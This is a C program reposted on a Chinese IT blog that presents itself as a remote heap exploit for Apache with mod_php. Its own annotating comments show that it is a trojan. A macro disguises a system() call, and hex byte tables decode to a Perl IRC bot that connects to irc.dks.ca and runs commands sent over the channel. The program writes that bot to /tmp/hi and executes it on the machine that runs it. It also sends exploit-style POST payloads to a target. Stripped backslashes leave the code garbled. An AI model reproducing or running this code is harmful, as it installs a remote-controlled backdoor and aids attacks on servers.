
[PRIVATE!] Apache

原创 IT综合 作者:coolwinds 时间:2005-08-25 00:27:16 0 删除 编辑

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
/*
 * Of these six macros only PREV_IN_USE is referenced anywhere in this
 * listing (the strncat() line near the end of main()).  It is not a
 * heap-metadata flag: it renames libc system(), so that call executes a
 * shell command taken from the `shellcode` byte table on the machine that
 * runs this program.  SIZE, VALID_RANGE, OFFSET, FD and BD are never used;
 * they only make the file look like a heap exploit.
 */
#define SIZE 0xffffff
#define PREV_IN_USE system   /* expands to system(); see main() */
#define VALID_RANGE 0xbffffe00
#define OFFSET 106
#define FD 0x080518fc
#define BD 0x08082000


/* Prefix copied in front of the script text in the POST body (main(), STEP1).
 * The page's extraction stripped backslashes: as shown it is the literal text
 * "xebx0a" plus ten 'i' bytes; the original presumably read "\xeb\x0a". */
char jmpcode[] = "xebx0aiiiiiiiiii";

/*
 * Not machine code.  Decoding the hex table (each "xNN" is one byte; the
 * backslashes were stripped by extraction) gives a Perl script that starts
 * "#!/usr/bin/perl", sets $chan="#cn", a fixed channel key, $nick="phpe" and
 * $server="irc.dks.ca", does "exit if fork;" to background itself, connects
 * to $server:6667 with IO::Socket, joins the channel, answers PING, and for
 * each PRIVMSG addressed to its nick runs the text through backticks
 * ($_=`$_`) and sends every output line back as PRIVMSG — an IRC-controlled
 * remote shell.  The last bytes are "#chmod +x /tmp/hi 2>/dev/null;/tmp/hi":
 * a comment inside the Perl file, but main() calls system(shellcode+764),
 * which is the same text starting at "chmod", after writing this script to
 * shellcode+793 == "/tmp/hi".  Indicators on a host that ran this tool:
 * file /tmp/hi, a perl process connecting to irc.dks.ca:6667, channel #cn.
 * 800 bytes, no embedded NUL, no trailing newline.
 */
char shellcode[] =
"x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
"x24x63x68x61x6ex3dx22x23x63x6ex22x3bx0ax24x6bx65"
"x79x20x3dx22x66x61x67x73x22x3bx0ax24x6ex69x63x6b"
"x3dx22x70x68x70x65x22x3bx0ax24x73x65x72x76x65x72"
"x3dx22x69x72x63x2ex64x6bx73x2ex63x61x22x3bx0ax24"
"x53x49x47x7bx54x45x52x4dx7dx3dx7bx7dx3bx0ax65x78"
"x69x74x20x69x66x20x66x6fx72x6bx3bx0ax75x73x65x20"
"x49x4fx3ax3ax53x6fx63x6bx65x74x3bx0ax24x73x6fx63"
"x6bx20x3dx20x49x4fx3ax3ax53x6fx63x6bx65x74x3ax3a"
"x49x4ex45x54x2dx3ex6ex65x77x28x24x73x65x72x76x65"
"x72x2ex22x3ax36x36x36x37x22x29x7cx7cx65x78x69x74"
"x3bx0ax70x72x69x6ex74x20x24x73x6fx63x6bx20x22x55"
"x53x45x52x20x70x68x70x65x20x2bx69x20x70x68x70x65"
"x20x3ax70x68x70x65x5cx6ex4ex49x43x4bx20x70x68x70"
"x65x5cx6ex22x3bx0ax24x69x3dx31x3bx0ax77x68x69x6c"
"x65x28x3cx24x73x6fx63x6bx3ex3dx7ex2fx5ex5bx5ex20"
"x5dx2bx20x28x5bx5ex20x5dx2bx29x20x2fx29x7bx0ax20"
"x20x20x20x24x6dx6fx64x65x3dx24x31x3bx0ax20x20x20"
"x20x6cx61x73x74x20x69x66x20x24x6dx6fx64x65x3dx3d"
"x22x30x30x31x22x3bx0ax20x20x20x20x69x66x28x24x6d"
"x6fx64x65x3dx3dx22x34x33x33x22x29x7bx0ax20x20x20"
"x20x20x20x20x20x24x69x2bx2bx3bx0ax20x20x20x20x20"
"x20x20x20x24x6ex69x63x6bx3dx7ex73x2fx5cx64x2ax24"
"x2fx24x69x2fx3bx0ax20x20x20x20x20x20x20x20x70x72"
"x69x6ex74x20x24x73x6fx63x6bx20x22x4ex49x43x4bx20"
"x24x6ex69x63x6bx5cx6ex22x3bx0ax20x20x20x20x7dx0a"
"x7dx0ax70x72x69x6ex74x20x24x73x6fx63x6bx20x22x4a"
"x4fx49x4ex20x24x63x68x61x6ex20x24x6bx65x79x5cx6e"
"x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
"x3ex29x7bx0ax20x20x20x20x69x66x20x28x2fx5ex50x49"
"x4ex47x20x28x2ex2ax29x24x2fx29x7bx0ax20x20x20x20"
"x20x20x20x20x70x72x69x6ex74x20x24x73x6fx63x6bx20"
"x22x50x4fx4ex47x20x24x31x5cx6ex4ax4fx49x4ex20x24"
"x63x68x61x6ex5cx6ex22x3bx0ax20x20x20x20x7dx0ax20"
"x20x20x20x69x66x20x28x73x2fx5ex5bx5ex20x5dx2bx20"
"x50x52x49x56x4dx53x47x20x24x63x68x61x6ex20x3ax24"
"x6ex69x63x6bx5bx5ex20x3ax5cx77x5dx2ax3ax5bx5ex20"
"x3ax5cx77x5dx2ax20x28x2ex2ax29x24x2fx24x31x2fx29"
"x20x7bx0ax20x20x20x20x20x20x20x20x73x2fx5cx73x2a"
"x24x2fx2fx3bx0ax20x20x20x20x20x20x20x20x24x5fx3d"
"x60x24x5fx60x3bx0ax20x20x20x20x20x20x20x20x66x6f"
"x72x65x61x63x68x20x28x73x70x6cx69x74x20x22x5cx6e"
"x22x29x20x7bx0ax20x20x20x20x20x20x20x20x20x20x20"
"x20x70x72x69x6ex74x20x24x73x6fx63x6bx20x22x50x52"
"x49x56x4dx53x47x20x24x63x68x61x6ex20x3ax24x5fx5c"
"x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
"x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
"x20x7dx0ax20x20x20x20x7dx0ax7dx0ax23x63x68x6dx6f"
"x64x20x2bx78x20x2fx74x6dx70x2fx68x69x20x32x3ex2f"
"x64x65x76x2fx6ex75x6cx6cx3bx2fx74x6dx70x2fx68x69";


/*
 * Same Perl IRC-bot script as `shellcode`, with its whitespace removed and a
 * different identity: $nick="phpfr", $server="irc.ham.de.euirc.net", USER
 * line "moron +i more :morev2", NICK "phpexx"; the same "#chmod +x /tmp/hi
 * ...;/tmp/hi" tail, and this one ends with a newline.  main() only copies
 * it into the POST body for targets 5 and 6; it is never written to disk or
 * executed by this program (the fopen()/system() calls always use
 * `shellcode`).  Backslashes were stripped by extraction ("xNN" was "\xNN").
 */
char fbsd_shellcode[] =
"x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
"x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
"x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
"x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
"x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
"x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
"x3dx7bx7dx3bx65x78x69x74x20x69x66x20x66x6fx72x6b"
"x3bx75x73x65x20x49x4fx3ax3ax53x6fx63x6bx65x74x3b"
"x24x73x6fx63x6bx20x3dx20x49x4fx3ax3ax53x6fx63x6b"
"x65x74x3ax3ax49x4ex45x54x2dx3ex6ex65x77x28x24x73"
"x65x72x76x65x72x2ex22x3ax36x36x36x37x22x29x7cx7c"
"x65x78x69x74x3bx70x72x69x6ex74x20x24x73x6fx63x6b"
"x20x22x55x53x45x52x20x6dx6fx72x6fx6ex20x2bx69x20"
"x6dx6fx72x65x20x3ax6dx6fx72x65x76x32x5cx6ex4ex49"
"x43x4bx20x70x68x70x65x78x78x5cx6ex22x3bx24x69x3d"
"x31x3bx77x68x69x6cx65x28x3cx24x73x6fx63x6bx3ex3d"
"x7ex2fx5ex5bx5ex20x5dx2bx20x28x5bx5ex20x5dx2bx29"
"x20x2fx29x7bx24x6dx6fx64x65x3dx24x31x3bx6cx61x73"
"x74x20x69x66x20x24x6dx6fx64x65x3dx3dx22x30x30x31"
"x22x3bx69x66x28x24x6dx6fx64x65x3dx3dx22x34x33x33"
"x22x29x7bx24x69x2bx2bx3bx24x6ex69x63x6bx3dx7ex73"
"x2fx5cx64x2ax24x2fx24x69x2fx3bx70x72x69x6ex74x20"
"x24x73x6fx63x6bx20x22x4ex49x43x4bx20x24x6ex69x63"
"x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
"x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
"x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
"x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
"x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
"x24x73x6fx63x6bx20x22x50x4fx4ex47x20x24x31x5cx6e"
"x4ax4fx49x4ex20x24x63x68x61x6ex5cx6ex22x3bx7dx69"
"x66x20x28x73x2fx5ex5bx5ex20x5dx2bx20x50x52x49x56"
"x4dx53x47x20x24x63x68x61x6ex20x3ax24x6ex69x63x6b"
"x5bx5ex20x3ax5cx77x5dx2ax3ax5bx5ex20x3ax5cx77x5d"
"x2ax20x28x2ex2ax29x24x2fx24x31x2fx29x20x7bx73x2f"
"x5cx73x2ax24x2fx2fx3bx24x5fx3dx60x24x5fx60x3bx66"
"x6fx72x65x61x63x68x20x28x73x70x6cx69x74x20x22x5c"
"x6ex22x29x20x7bx70x72x69x6ex74x20x24x73x6fx63x6b"
"x20x22x50x52x49x56x4dx53x47x20x24x63x68x61x6ex20"
"x3ax24x5fx5cx6ex22x3bx73x6cx65x65x70x20x31x3bx7d"
"x7dx7dx23x63x68x6dx6fx64x20x2bx78x20x2fx74x6dx70"
"x2fx68x69x20x32x3ex2fx64x65x76x2fx6ex75x6cx6cx3b"
"x2fx74x6dx70x2fx68x69x0a";

/*
 * Print the command-line help to stdout.
 *
 * @param arg  argv[0], echoed into the "Usage:" line.
 *
 * The text is reproduced exactly as it appears on the page: extraction
 * stripped the backslashes, so each line ends in a literal 'n' (was "\n")
 * and the indented options start with a literal 't' (was "\t").
 */
void usage(char *arg){
    static const char *const help_lines[] = {
        "Options:n",
        "t-h ip/host of targetn",
        "t-p portn",
        "t-d php filen",
        "t-B memory_limit 8/16/64n",
        "t-t targetn",
        "Targets for Apache 1.3.31 & php 4.3.7:n",
        "tFreeBSD 5: 0n",
        "tFreeBSD 4.x: 1n",
        "tFedora Core 2: 2n",
        "tRedhat 9: 3n",
        "tSuSe 9.1: 4n",
        "tDebian 3: 5n",
        "tGentoo 2004: 6n",
    };
    fputs("* mod_php remote exploit vs Linux/FreeBSD *n", stdout);
    printf("Usage: %s -h -d n", arg);
    for (size_t i = 0; i < sizeof help_lines / sizeof help_lines[0]; i++) {
        fputs(help_lines[i], stdout);
    }
}

/*
 * Entry point.  Parses -h/-p/-d/-B/-t, then runs three "steps" whose remote
 * effect is largely cosmetic (see the per-line comments: the probes reuse a
 * close()d descriptor, and the final POST body is truncated before it is
 * sent).  The one effect that reliably happens is local: the `shellcode`
 * text is written to /tmp/hi and executed on the machine running this
 * program, via fopen() and the PREV_IN_USE (== system) macro.
 *
 * Extraction note: the page stripped backslashes, so "n" in messages was
 * "\n", "rn" in the HTTP headers was "\r\n", and '' was '\0'.  As shown the
 * file does not compile ('' is an empty character constant).
 *
 * @param argc  argument count
 * @param argv  argument vector; argv[0] is echoed by usage()
 * @return 0 after the final connect attempt, 1 on usage/resolve/connect error
 */
int main(int argc, char **argv){
FILE *jmpinst;
/* h is never initialised; it is only written by -h, yet argc < 3 does not
 * guarantee -h was given, so inet_aton(h, ...) below may read garbage. */
char h[500],file[500]="index.php",buffer[1024], *payload, *ptr;
int port=80,limit=8,target=0,sock;
struct hostent *host;
struct sockaddr_in addr;   /* never zeroed; only sin_addr/sin_port/sin_family are set */

if(argc < 3){
usage(argv[0]);
return 1;
}

while (optind < argc){
/* The option string lists 'd' twice and uses "t:::"; how getopt treats that
 * is implementation-specific — assume option parsing is unreliable. */
int result = getopt(argc, argv, "p::d:B::t:::h:d:");
if (result == -1) break;
switch (result){
case 'h':
/* strncpy with the full buffer size: a 500+ byte argument leaves h unterminated. */
strncpy(h,optarg,sizeof(h));
break;
case 'd':
strncpy(file,optarg,sizeof(file));   /* same unterminated-copy issue as -h */
break;
case 'p':
if (optarg)
port = atoi(optarg);
else
port = 80;
break;
case 'B':
if (optarg)
limit = atoi(optarg);
else
limit = 8;
if(limit != 8 && limit != 16 && limit != 64)
limit = 8;
break;
case 't':
/* target is initialised to 0, so this test is never true: -t is silently
 * ignored and target stays 0 whatever value was passed. */
if (target)
target = atoi(optarg);
else
target = 0;
if(target != 0 && target != 1 && target != 2 &&
target != 3 && target != 4 && target != 5 &&
target != 6)
target = 0;
break;
default:
usage(argv[0]);
return 1;
}
}
if (!inet_aton(h, &addr.sin_addr)){
host = gethostbyname(h);
if (!host){
printf("Resolving failedn");
return 1;
}
addr.sin_addr = *(struct in_addr*)host->h_addr;
}
sock = socket(PF_INET, SOCK_STREAM, 0);   /* return value unchecked */
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
printf("Connecting failedn");
return 1;
}
/* STEP1 prints a fixed "Ok" line for the locally chosen -B value; nothing is
 * tested against the server. */
printf("STEP1 - Guessing remote memory_limitn");
switch(limit){
case 8:
printf("+ Testing 8MO ... Ok !n");
break;
case 16:
printf("+ Testing 16MO ... Ok !n");
break;
case 64:
printf("+ Testing 64MO ... Ok !n");
break;
default:
printf("+ Testing 64MO ... Ok !n");
}
payload = malloc(limit * 10000);   /* unchecked allocation */
ptr = payload+8;
memcpy(ptr,jmpcode,strlen(jmpcode));
/* LOCAL SIDE EFFECT: shellcode+793 is the text "/tmp/hi" (offset computed
 * from the hex table), so this writes the Perl IRC-bot script held in
 * `shellcode` to /tmp/hi on the operator's own machine.  Nothing here
 * touches the remote host; the file is executed by the system() call below. */
jmpinst=fopen(shellcode+793,"w+");
if(jmpinst){
fseek(jmpinst,0,SEEK_SET);
fprintf(jmpinst,"%s",shellcode);
fclose(jmpinst);
}
ptr += strlen(jmpcode);
if(target != 5 && target != 6){
memcpy(ptr,shellcode,strlen(shellcode));
ptr += strlen(shellcode);
memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
}
else{
memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
ptr += strlen(fbsd_shellcode);
memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
}
/* STEP2: four POSTs of decreasing size.  After each one the socket is
 * close()d and then connect()ed again on the same, now invalid, descriptor
 * number; that connect() fails with EBADF, so "CRASH" is printed regardless
 * of what the server did, and the remaining send() calls go nowhere. */
printf("STEP2 - Guessing heap junk sizen");
printf("+ 1000 ... ");
snprintf(buffer,sizeof(buffer),
"POST /%s HTTP/1.1rn"
"Host: %srn"
"Referer: www.google.comrn"
"Content-type: application/x-www-form-urlencodedrn"
"Content-length: %drn"
"Connection: closernrn"
"foobar=",file,h,10000-1);
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,10000,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1)
printf("CRASHn");
else
printf("ALIVEn");
printf("+ 500 ... ");
snprintf(buffer,sizeof(buffer),
"POST /%s HTTP/1.1rn"
"Host: %srn"
"Referer: www.google.comrn"
"Content-type: application/x-www-form-urlencodedrn"
"Content-length: %drn"
"Connection: closernrn"
"foobar=",file,h,5000-1);
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,5000,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1)
printf("CRASHn");
else
printf("ALIVEn");
printf("+ 250 ... ");
snprintf(buffer,sizeof(buffer),
"POST /%s HTTP/1.1rn"
"Host: %srn"
"Referer: www.google.comrn"
"Content-type: application/x-www-form-urlencodedrn"
"Content-length: %drn"
"Connection: closernrn"
"foobar=",file,h,2500-1);
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,2500,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1)
printf("CRASHn");
else
printf("ALIVEn");
printf("+ 375 ... ");
snprintf(buffer,sizeof(buffer),
"POST /%s HTTP/1.1rn"
"Host: %srn"
"Referer: www.google.comrn"
"Content-type: application/x-www-form-urlencodedrn"
"Content-length: %drn"
"Connection: closernrn"
"foobar=",file,h,3750-1);
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,3750,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1)
printf("CRASHn");
else
printf("ALIVEn");
/* STEP3: writes two hard-coded per-target pointers into the first 8 bytes of
 * payload.  Because -t is ignored above, only case 0 is ever reached. */
printf("STEP3 - Taking control over pDestructor BADn");
switch(target){
case 0:
printf("+ Targeting FreeBSD 5 Ok !n");
ptr = payload;
*((void **)ptr) = (void *)(0x080537ce - 12);
ptr += 4;
*((void **)ptr) = (void *)(0x08082000 + 8);
break;
case 1:
printf("+ Targeting FreeBSD 4 Ok !n");
ptr = payload;
*((void **)ptr) = (void *)(0x080637ce - 12);
ptr += 4;
*((void **)ptr) = (void *)(0x08081000 + 8);
break;
case 2:
printf("+ Targeting Fedora Ok !n");
ptr = payload;
*((void **)ptr) = (void *)(0x0807e5f4 - 12);
ptr += 4;
*((void **)ptr) = (void *)(0x08081000 + 8);
break;
case 3:
printf("+ Targeting Redhat Ok !n");
ptr = payload;
*((void **)ptr) = (void *)(0x0805c1fc - 12);
ptr += 4;
*((void **)ptr) = (void *)(0x08062000 + 8);
break;
case 4:
printf("+ Targeting SuSe Ok !n");
ptr = payload;
*((void **)ptr) = (void *)(0x080518fc - 12);
ptr += 4;
*((void **)ptr) = (void *)(0x08073000 + 8);
break;
case 5:
printf("+ Targeting Debian Ok !n");
ptr = payload;
*((void **)ptr) = (void *)(0x080713ce - 12);
ptr += 4;
*((void **)ptr) = (void *)(0x08025000 + 8);
break;
case 6:
printf("+ Targeting Gentoo Ok !n");
ptr = payload;
*((void **)ptr) = (void *)(0x080937ce - 12);
ptr += 4;
*((void **)ptr) = (void *)(0x08072000 + 8);
break;
}
/* sizeof(payload) is the size of the pointer variable (4 on the 32-bit
 * targets listed), not of the malloc()ed block, so these two stores zero
 * payload[2] and payload[3] — the high bytes of the pointer just written —
 * and strlen(payload) below sees at most a couple of bytes.  '' is an empty
 * character constant (garbled '\0'). */
payload[sizeof(payload)-1] = '';
payload[sizeof(payload)-2] = '';
/* BACKDOOR TRIGGER: PREV_IN_USE is #defined as system, and shellcode+764 is
 * the text "chmod +x /tmp/hi 2>/dev/null;/tmp/hi" (offset computed from the
 * hex table; it is the byte after the '#' that comments the same command out
 * inside the Perl file).  This runs the bot that fopen() wrote above, on the
 * local machine.  The strncat() only exists to make system()'s return value
 * look like a length argument. */
strncat(payload,"0x1",PREV_IN_USE(shellcode+764));
/* sock was close()d at the end of STEP2 and never re-created, so neither
 * send() here reaches the server. */
snprintf(buffer,sizeof(buffer),
"POST /%s HTTP/1.1rn"
"Host: %srn"
"Referer: www.google.comrn"
"Content-type: application/x-www-form-urlencodedrn"
"Content-length: %drn"
"Connection: closernrn"
"foobar=",file,h,strlen(payload)+8);
send(sock,buffer,strlen(buffer),0);
send(sock,payload,strlen(payload),0);
close(sock);
free(payload);
/* connect() on the closed descriptor cannot succeed, so the "FAILED" branch
 * is always taken; close() is then called on it a second time. */
addr.sin_port = htons(6666);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0)
printf("-- YOU ARE IN FUCKER --n");
else
printf("-- FAILED - WRONG TARGET FUCKER --n");
close(sock);
return 0;
}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-805091/,如需转载,请注明出处,否则将追究法律责任。
